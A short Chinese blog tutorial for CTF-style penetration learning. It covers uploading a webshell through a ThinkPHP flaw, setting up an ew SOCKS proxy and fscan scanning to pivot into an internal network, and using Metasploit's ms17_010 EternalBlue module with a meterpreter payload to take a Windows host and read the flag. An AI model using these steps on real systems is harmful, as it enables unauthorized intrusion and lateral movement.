渗透学习
初识渗透
我们如果需要打进内网的机子,则需要先在外网的机子上搭建代理才能访问内网机子
利用漏洞,打进外网
如果是ssh直接连接的话就是最简单的了
连接建议使用tabby,够简单轮椅。(可以看我的那篇awd初体验 | MetaVi)
如果是别的的话我们需要先利用web知识打进外网
如:利用thinkphp漏洞传上木马再蚁剑连接
搭建代理,连接内网
外网的机子我们连接上shell后,我们需要把ew(GitHub - idlefire/ew: 内网穿透(跨平台))安装到这个外网机子上,安装的时候最好把fscan也装上。
(如果是ssh连接的话,这里就展示出tabby的优势之处了——sftp可以直接拖拽上传。当然蚁剑也可以拖拽上传)
安装好之后就可以搭建代理服务了
1 | chmod +x ew_for_linux64 |
显示这个:ssocksd 0.0.0.0:22222 <--[10000 usec]--> socks server
就表示成功了
之后我们需要proxifier
设置好,这个网上教程还是很多的
设置好之后就可以访问内网了,怎么鉴别是否成功,我们直接在浏览器上访问内网看能否访问就行。
(有些连接上之后就不能再访问网站了如chatgpt,csdn等等,我们想访问的时候就要先断开proxifier。)
那我们怎么知道有那些内网呢?
自然是fscan扫一下了
扫完之后就能给你报有那些内网机子,然后给就可以打了。
永恒之蓝漏洞
一个很著名的漏洞
我们要先配置好msf(Nightly Installers | Metasploit Documentation Penetration Testing Software, Pen Testing Security)
下载windows版本的(kali自带一个msf)
下载后记得手动添加环境变量
运行
1 | msfconsole |
成功之后长这样(图案每次随机生成)
然后我们就可以选择漏洞类型了
1 | search ms17_010 |
然后我们需要填远程ip
1 | set RHOST ip地址 |
然后直接
1 | run |
如果还是不行的话我们
1 | show options |
看看有什么没填。
1 | set payload windows/x64/meterpreter/bind_tcp_uuid |
run完成功后就显示win
win之后我们就能拿到权限了,查找flag。